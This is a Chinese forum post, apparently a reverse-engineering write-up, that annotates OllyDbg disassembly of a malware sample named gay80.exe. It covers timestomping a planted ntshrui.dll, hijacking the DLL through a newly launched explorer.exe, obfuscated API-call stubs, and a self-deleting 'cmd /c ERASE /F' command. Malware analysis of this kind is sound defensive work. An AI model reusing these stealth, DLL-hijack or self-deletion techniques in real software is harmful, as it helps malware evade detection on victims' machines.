00404458 .-|FF25 F0504000 JMP DWORD PTR DS:[<&KERNEL32.GetFileTime>] ; kernel32.GetFileTime
//得到这个notepa.exe的创建时间什么的
0040445E . |53 PUSH EBX
0040445F . |68 7F444000 PUSH gay80.0040447F
00404464 . |50 PUSH EAX
00404465 . |B8 66444000 MOV EAX,gay80.00404466
0040446A . |0FB7C0 MOVZX EAX,AX
0040446D . |C1E8 04 SHR EAX,4
00404470 . |83E8 02 SUB EAX,2
00404473 . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404476 . |83C4 04 ADD ESP,4
00404479 .-|FF25 D4504000 JMP DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; kernel32.CloseHandle
0040447F . |29D2 SUB EDX,EDX
00404481 . |52 PUSH EDX
00404482 . |52 PUSH EDX
00404483 . |6A 03 PUSH 3//OPEN_EXISTING
00404485 . |52 PUSH EDX
00404486 . |6A 01 PUSH 1
00404488 . |68 000000C0 PUSH C0000000
0040448D . |56 PUSH ESI
0040448E . |68 AE444000 PUSH gay80.004044AE
00404493 . |50 PUSH EAX
00404494 . |B8 95444000 MOV EAX,gay80.00404495
00404499 . |0FB7C0 MOVZX EAX,AX
0040449C . |C1E8 04 SHR EAX,4
0040449F . |83E8 02 SUB EAX,2
004044A2 . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
004044A5 . |83C4 04 ADD ESP,4
004044A8 .-|FF25 D8504000 JMP DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; kernel32.CreateFileA
//这里打开C:\\WINDOWS\\ntshrui.dll看参数,是打开,不是创建
004044AE . |83F8 FF CMP EAX,-1
004044B1 . |74 4F JE SHORT gay80.00404502
004044B3 . |93 XCHG EAX,EBX
004044B4 . |8D57 18 LEA EDX,DWORD PTR DS:[EDI+18]
004044B7 . |52 PUSH EDX
004044B8 . |8D57 10 LEA EDX,DWORD PTR DS:[EDI+10]
004044BB . |52 PUSH EDX
004044BC . |8D57 08 LEA EDX,DWORD PTR DS:[EDI+8]
004044BF . |52 PUSH EDX
004044C0 . |53 PUSH EBX
004044C1 . |68 E1444000 PUSH gay80.004044E1
004044C6 . |50 PUSH EAX
004044C7 . |B8 C8444000 MOV EAX,gay80.004044C8
004044CC . |0FB7C0 MOVZX EAX,AX
004044CF . |C1E8 04 SHR EAX,4
004044D2 . |83E8 02 SUB EAX,2
004044D5 . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
004044D8 . |83C4 04 ADD ESP,4
004044DB .-|FF25 18514000 JMP DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; kernel32.SetFileTime
//将notepa的创建时间等时间设置到这个dll上面,让人发觉不了
004044E1 . |53 PUSH EBX
004044E2 . |68 02454000 PUSH gay80.00404502
004044E7 . |50 PUSH EAX
004044E8 . |B8 E9444000 MOV EAX,gay80.004044E9
004044ED . |0FB7C0 MOVZX EAX,AX
004044F0 . |C1E8 04 SHR EAX,4
004044F3 . |83E8 02 SUB EAX,2
004044F6 . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
004044F9 . |83C4 04 ADD ESP,4
004044FC .-|FF25 D4504000 JMP DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; kernel32.CloseHandle
.//关句柄
00404502 > |C9 LEAVE
00404503 . |61 POPAD
//接着来看。。。
00404A75 . 68 944A4000 PUSH gay80.00404A94
00404A7A . 50 PUSH EAX
00404A7B . B8 7C4A4000 MOV EAX,gay80.00404A7C
00404A80 . 0FB7C0 MOVZX EAX,AX
00404A83 . C1E8 04 SHR EAX,4
00404A86 . 83E8 02 SUB EAX,2
00404A89 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404A8C . 83C4 04 ADD ESP,4
00404A8F . E9 DE020000 JMP gay80.00404D72//这里上面看过了,就是调用findwindows查找_CLS_SessionAgent
//接下来是一段没有反汇编出来的,查机器码得到的
00404A94 85 DB 85
00404A95 C0 DB C0
00404A96 75 DB 75 ; CHAR 'u'
00404A97 1F DB 1F //jnz 404a97+1f+1=404AB7
00404A98 68 DB 68 //PUSH 00404AB7 ; CHAR 'h'
00404A99 B74A4000 DD gay80.00404AB7
00404A9D 50 DB 50 //PUSH EAX ; CHAR 'P'
00404A9E B8 DB B8
00404A9F 9F4A4000 DD gay80.00404A9F
00404AA3 0F DB 0F
00404AA4 B7 DB B7
00404AA5 C0 DB C0 //MOVZX EAX,AX
00404AA6 C1 DB C1
00404AA7 E8 DB E8
00404AA8 04 DB 04 //shr eax,4
00404AA9 83 DB 83 //
00404AAA E8 DB E8 //
00404AAB 02 DB 02 //SUB EAX,2
00404AAC 8B DB 8B
00404AAD 04 DB 04
00404AAE 24 DB 24 //MOV EAX,DWORD PTR SS:[ESP] ; CHAR '$'
00404AAF 83 DB 83
00404AB0 C4 DB C4 //ADD ESP,4
00404AB1 . 04 E9 ADD AL,0E9
00404AB3 . 9B WAIT
00404AB4 . F7FF IDIV EDI
00404AB6 . FFC9 DEC ECX //JMP gay80.00404252
整理下
【
00404A94 85 DB 85
00404A95 C0 DB C0
00404A96 75 1F JNZ SHORT gay80.00404AB7
00404A98 68 B74A4000 PUSH gay80.00404AB7
00404A9D 50 PUSH EAX
00404A9E B8 9F4A4000 MOV EAX,gay80.00404A9F
00404AA3 0FB7C0 MOVZX EAX,AX
00404AA6 C1E8 04 SHR EAX,4
00404AA9 83E8 02 SUB EAX,2
00404AAC 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404AAF 83C4 04 ADD ESP,4
00404AB2 ^ E9 9BF7FFFF JMP gay80.00404252
00404AB7 ? C9 LEAVE
】
跳转到404252处
00404258 . 8B3424 MOV ESI,DWORD PTR SS:[ESP]
0040425B . 83C4 04 ADD ESP,4
0040425E . 29D2 SUB EDX,EDX
00404260 . 52 PUSH EDX
00404261 . 68 00000010 PUSH 10000000
00404266 . 52 PUSH EDX
00404267 . 52 PUSH EDX
00404268 . 52 PUSH EDX
00404269 . 56 PUSH ESI
0040426A . 68 8A424000 PUSH gay80.0040428A
0040426F . 50 PUSH EAX
00404270 . B8 71424000 MOV EAX,gay80.00404271
00404275 . 0FB7C0 MOVZX EAX,AX
00404278 . C1E8 04 SHR EAX,4
0040427B . 83E8 02 SUB EAX,2
0040427E . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404281 . 83C4 04 ADD ESP,4
00404284 .- FF25 B6524000 JMP DWORD PTR DS:[<&USER32.CreateDesktopA>] ; USER32.CreateDesktopA
..创建一个桌面
0040428A . 09C0 OR EAX,EAX
0040428C . 0F84 02010000 JE gay80.00404394
00404292 . 68 58010000 PUSH 158
00404297 . 8B0C24 MOV ECX,DWORD PTR SS:[ESP]
0040429A . 83C4 04 ADD ESP,4
0040429D . 29CC SUB ESP,ECX
0040429F . 89E7 MOV EDI,ESP
004042A1 . FC CLD
004042A2 . 31C0 XOR EAX,EAX
004042A4 . 57 PUSH EDI
004042A5 . F3:AA REP STOS BYTE PTR ES:[EDI]
004042A7 . 8B3C24 MOV EDI,DWORD PTR SS:[ESP]
004042AA . 83C4 04 ADD ESP,4
004042AD . 57 PUSH EDI
004042AE . 68 CE424000 PUSH gay80.004042CE
004042B3 . 50 PUSH EAX
004042B4 . B8 B5424000 MOV EAX,gay80.004042B5
004042B9 . 0FB7C0 MOVZX EAX,AX
004042BC . C1E8 04 SHR EAX,4
004042BF . 83E8 02 SUB EAX,2
004042C2 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
004042C5 . 83C4 04 ADD ESP,4
004042C8 .- FF25 FC504000 JMP DWORD PTR DS:[<&KERNEL32.GetStartupInfoA>] ; kernel32.GetStartupInfoA
..、、得到进程的一些启动信息,为下面创建进程做准备
004042CE . 8977 08 MOV DWORD PTR DS:[EDI+8],ESI
004042D1 . C747 2C 81000>MOV DWORD PTR DS:[EDI+2C],81
004042D8 . 8D77 54 LEA ESI,DWORD PTR DS:[EDI+54]
004042DB . 68 04010000 PUSH 104
004042E0 . 56 PUSH ESI
004042E1 . 68 FD424000 PUSH gay80.004042FD ; ASCII "%windir%\explorer.exe"
004042E6 . 50 PUSH EAX
004042E7 . B8 E8424000 MOV EAX,gay80.004042E8
004042EC . 0FB7C0 MOVZX EAX,AX
004042EF . C1E8 04 SHR EAX,4
004042F2 . 83E8 02 SUB EAX,2
004042F5 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
004042F8 . 83C4 04 ADD ESP,4
004042FB . EB 16 JMP SHORT gay80.00404313//call 下面
004042FD . 25 77 69 6E 6>ASCII "%windir%\explore"
0040430D . 72 2E 65 78 6>ASCII "r.exe",0
00404313 > 68 33434000 PUSH gay80.00404333
00404318 . 50 PUSH EAX
00404319 . B8 1A434000 MOV EAX,gay80.0040431A
0040431E . 0FB7C0 MOVZX EAX,AX
00404321 . C1E8 04 SHR EAX,4
00404324 . 83E8 02 SUB EAX,2
00404327 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
0040432A . 83C4 04 ADD ESP,4
0040432D .- FF25 E8504000 JMP DWORD PTR DS:[<&KERNEL32.ExpandEnvironmentStr>; kernel32.ExpandEnvironmentStringsA
//注册%windir%\explorer.exe为系统环境变量
00404333 . 8D47 44 LEA EAX,DWORD PTR DS:[EDI+44]
00404336 . 29D2 SUB EDX,EDX
00404338 . 50 PUSH EAX
00404339 . 57 PUSH EDI
0040433A . 52 PUSH EDX
0040433B . 52 PUSH EDX
0040433C . 68 00084000 PUSH gay80.00400800
00404341 . 52 PUSH EDX
00404342 . 52 PUSH EDX
00404343 . 52 PUSH EDX
00404344 . 56 PUSH ESI
00404345 . 52 PUSH EDX
00404346 . 68 66434000 PUSH gay80.00404366
0040434B . 50 PUSH EAX
0040434C . B8 4D434000 MOV EAX,gay80.0040434D
00404351 . 0FB7C0 MOVZX EAX,AX
00404354 . C1E8 04 SHR EAX,4
00404357 . 83E8 02 SUB EAX,2
0040435A . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
0040435D . 83C4 04 ADD ESP,4
00404360 .- FF25 DC504000 JMP DWORD PTR DS:[<&KERNEL32.CreateProcessA>] ; kernel32.CreateProcessA
//以C:\\WINDOWS\\explorer.exe为参数创建进程,创建进程后便于加载相应的dll,前面已经将ntshrui.dll映射了相关的dll
//这样这个dll就会在新的explorer中加载了
00404366 . 68 70170000 PUSH 1770
0040436B . FF77 48 PUSH DWORD PTR DS:[EDI+48]
0040436E . 68 8E434000 PUSH gay80.0040438E
00404373 . 50 PUSH EAX
00404374 . B8 75434000 MOV EAX,gay80.00404375
00404379 . 0FB7C0 MOVZX EAX,AX
0040437C . C1E8 04 SHR EAX,4
0040437F . 83E8 02 SUB EAX,2
00404382 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404385 . 83C4 04 ADD ESP,4
00404388 .- FF25 1C514000 JMP DWORD PTR DS:[<&KERNEL32.WaitForSingleObject>>; kernel32.WaitForSingleObject
//等待创建的进程一段时间
0040438E . 81C4 58010000 ADD ESP,158
00404394 > 61 POPAD
00404395 . C3 RETN
//返回到下面代码后,便释放分配的内存,然后便退出进程了
00404AB8 . 57 PUSH EDI
00404AB9 . 68 D94A4000 PUSH gay80.00404AD9
00404ABE . 50 PUSH EAX
00404ABF . B8 C04A4000 MOV EAX,gay80.00404AC0
00404AC4 . 0FB7C0 MOVZX EAX,AX
00404AC7 . C1E8 04 SHR EAX,4
00404ACA . 83E8 02 SUB EAX,2
00404ACD . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404AD0 . 83C4 04 ADD ESP,4
00404AD3 .- FF25 0C514000 JMP DWORD PTR DS:[<&KERNEL32.GlobalFree>] ; kernel32.GlobalFree
00404AD9 . FF0D 3C104000 DEC DWORD PTR DS:[40103C]
00404ADF . 75 1F JNZ SHORT gay80.00404B00
00404AE1 . 68 004B4000 PUSH gay80.00404B00
00404AE6 . 50 PUSH EAX
00404AE7 . B8 E84A4000 MOV EAX,gay80.00404AE8
00404AEC . 0FB7C0 MOVZX EAX,AX
00404AEF . C1E8 04 SHR EAX,4
00404AF2 . 83E8 02 SUB EAX,2
00404AF5 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404AF8 . 83C4 04 ADD ESP,4
00404AFB .^ E9 A0FAFFFF JMP gay80.004045A0
004045A0 > /57 PUSH EDI
004045A1 . |55 PUSH EBP
004045A2 . |89E5 MOV EBP,ESP
004045A4 . |81EC F4010000 SUB ESP,1F4
004045AA . |89E7 MOV EDI,ESP
004045AC . |57 PUSH EDI
004045AD . |57 PUSH EDI
004045AE . |68 A4534000 PUSH gay80.004053A4 ; ASCII "%ComSpec% /c ERASE /F "
004045B3 . |68 D3454000 PUSH gay80.004045D3
004045B8 . |50 PUSH EAX
004045B9 . |B8 BA454000 MOV EAX,gay80.004045BA
004045BE . |0FB7C0 MOVZX EAX,AX
004045C1 . |C1E8 04 SHR EAX,4
004045C4 . |83E8 02 SUB EAX,2
004045C7 . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
004045CA . |83C4 04 ADD ESP,4
004045CD .-|FF25 E8504000 JMP DWORD PTR DS:[<&KERNEL32.ExpandEnvir>; kernel32.ExpandEnvironmentStringsA
004045D3 . |81C7 2C010000 ADD EDI,12C
004045D9 . |68 C8000000 PUSH 0C8
004045DE . |57 PUSH EDI
004045DF . |6A 00 PUSH 0
004045E1 . |68 01464000 PUSH gay80.00404601
004045E6 . |50 PUSH EAX
004045E7 . |B8 E8454000 MOV EAX,gay80.004045E8
004045EC . |0FB7C0 MOVZX EAX,AX
004045EF . |C1E8 04 SHR EAX,4
004045F2 . |83E8 02 SUB EAX,2
004045F5 . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
004045F8 . |83C4 04 ADD ESP,4
004045FB .-|FF25 F4504000 JMP DWORD PTR DS:[<&KERNEL32.GetModuleFi>; kernel32.GetModuleFileNameA
00404601 . |68 C8000000 PUSH 0C8
00404606 . |57 PUSH EDI
00404607 . |57 PUSH EDI
00404608 . |68 28464000 PUSH gay80.00404628
0040460D . |50 PUSH EAX
0040460E . |B8 0F464000 MOV EAX,gay80.0040460F
00404613 . |0FB7C0 MOVZX EAX,AX
00404616 . |C1E8 04 SHR EAX,4
00404619 . |83E8 02 SUB EAX,2
0040461C . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
0040461F . |83C4 04 ADD ESP,4
00404622 .-|FF25 F8504000 JMP DWORD PTR DS:[<&KERNEL32.GetShortPat>; kernel32.GetShortPathNameA
00404628 . |57 PUSH EDI
00404629 . |81EF 2C010000 SUB EDI,12C
0040462F . |57 PUSH EDI
00404630 . |68 50464000 PUSH gay80.00404650
00404635 . |50 PUSH EAX
00404636 . |B8 37464000 MOV EAX,gay80.00404637
0040463B . |0FB7C0 MOVZX EAX,AX
0040463E . |C1E8 04 SHR EAX,4
00404641 . |83E8 02 SUB EAX,2
00404644 . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404647 . |83C4 04 ADD ESP,4
0040464A .-|FF25 28514000 JMP DWORD PTR DS:[<&KERNEL32.lstrcatA>] ; kernel32.lstrcatA
00404650 . |6A 00 PUSH 0
00404652 . |57 PUSH EDI
00404653 . |68 73464000 PUSH gay80.00404673
00404658 . |50 PUSH EAX
00404659 . |B8 5A464000 MOV EAX,gay80.0040465A
0040465E . |0FB7C0 MOVZX EAX,AX
00404661 . |C1E8 04 SHR EAX,4
00404664 . |83E8 02 SUB EAX,2
00404667 . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
0040466A . |83C4 04 ADD ESP,4
0040466D .-|FF25 20514000 JMP DWORD PTR DS:[<&KERNEL32.WinExec>] ; kernel32.WinExec
得到自身的路径
将路径转换成短路径
然后再命令行下启动
0006FCB4 00404650 /CALL 到 lstrcatA
0006FCB8 0006FCC0 |ConcatString = "C:\WINDOWS\system32\cmd.exe /c ERASE /F "
0006FCBC 0006FDEC \StringToAdd = "C:\DOCUME~1\ADMINI~1\桌面\gay80\gay80.exe"
00404673 . |87EC XCHG ESP,EBP
00404675 . |8B2C24 MOV EBP,DWORD PTR SS:[ESP]
00404678 . |83C4 04 ADD ESP,4
0040467B . |8B3C24 MOV EDI,DWORD PTR SS:[ESP]
0040467E . |83C4 04 ADD ESP,4
00404681 . |C3 RETN
00404B00 > 6A 00 PUSH 0
00404B02 . 68 224B4000 PUSH gay80.00404B22
00404B07 . 50 PUSH EAX
00404B08 . B8 094B4000 MOV EAX,gay80.00404B09
00404B0D . 0FB7C0 MOVZX EAX,AX
00404B10 . C1E8 04 SHR EAX,4
00404B13 . 83E8 02 SUB EAX,2
00404B16 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404B19 . 83C4 04 ADD ESP,4
00404B1C .- FF25 E4504000 JMP DWORD PTR DS:[<&KERNEL32.ExitProcess>; kernel32.ExitProcess
.........................
接下来看我们那个dll是做什么的
里面先用设置"%windir%\system32\ntshrui.dll"
的环境变量,这个字符都是动态解析出来的
然后加载"C:\WINDOWS\system32\ntshrui.dll"。这个是系统原本的dll
然后调用GetProAddress得到DllCanUnloadNow和DllGetClassObject
的地址,分别将这2个地址写入到一个固定的地方
再继续动态解析出explorer.exe字符,使用GetModuleFileName得到当前目录下的exe名
然后和explorer比较是否相等,相等的话就创建一个071900的事件
并调用RtlGetLastWin32Error进行判断,返回0的话就创建一个线程
线程地址是381387,在往下看下这个线程做些什么就知道啥病毒行为了就不分析了,需要的自己看下吧
不早了,要睡觉了,困死了。晚安大家 。
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!